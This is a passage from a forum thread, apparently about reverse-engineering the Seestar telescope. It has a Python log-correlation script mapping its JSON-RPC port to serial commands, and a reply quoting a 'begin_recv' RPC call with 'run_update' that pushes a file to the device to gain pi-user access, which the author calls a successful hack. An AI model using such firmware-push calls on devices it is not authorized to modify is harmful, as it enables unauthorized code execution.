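            req = p["req"]
            pairs.append({
                "id": key[1], "port": key[0], "method": req["msg"]["method"],
                "latency_ms": (e["ts"] - req["ts"]).total_seconds() * 1000.0,
                "serial_cmds": [c for s in p["serial"] if s["kind"] == "tty_write" for c in s["cmds"]],
                "serial_replies": [s["data"] for s in p["serial"] if s["kind"] == "tty_read"],
                "result": e["msg"].get("result"), "code": e["msg"].get("code"),
            })
    return {"pairs": pairs, "orphans": orphans, "unanswered": list(pending)}


if __name__ == "__main__":
    out = correlate(SAMPLE)
    for p in out["pairs"]:
        print(f'id={p["id"]} {p["method"]} {p["latency_ms"]:.1f} ms via {p["serial_cmds"]}')
    print("orphan replies:", [o["id"] for o in out["orphans"]])
```

Run over a full log_guider.txt this gives, per RPC method, which serial commands the daemon issues on the mount's behalf and how long the mount takes to answer; that is the quickest way to map the JSON-RPC surface on 4400 to the underlying LX200-style command set without reading the binary.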



#73 mconsidine

    Explorer 1

  • Posts: 96
  • Joined: 16 Nov 2006

Posted 12 January 2024 - 07:33 PM

On a slightly different note ... Has anyone else wondered if it's possible to get the 16 bit (12 data bit) output from the 462 vs the 8bit we get in the videos? Ie how do we get the equivalent of a SER file instead of AVI? I'd like that for solar work.

#74 Oxofrimbl

    Lift Off

  • Posts: 10
  • Joined: 09 Jan 2024

Posted 14 January 2024 - 04:58 PM

Hi Oxofrimbl,
I did try your script on my Seestar firmware v2.06 and got this back. I do not know what to do with it ......

"Got back:
Try to connect to binary port 6000 (legacy?)
Got:
Sending RPC: {"id":1,"method":"begin_recv","params":[{"file_len":264,"file_name":"air","run_update":true,"md5":"79a3831e7e6555f9c0335c824a1aa01b"}]}
"

... if you have any idea how to get into it as the pi user?! ......

By the way, I have found those ports:

Tkx,
Stephane.



#75 Oxofrimbl

    Lift Off

  • Posts: 10
  • Joined: 09 Jan 2024

Posted 14 January 2024 - 04:58 PM

This means your hack was successful ;)

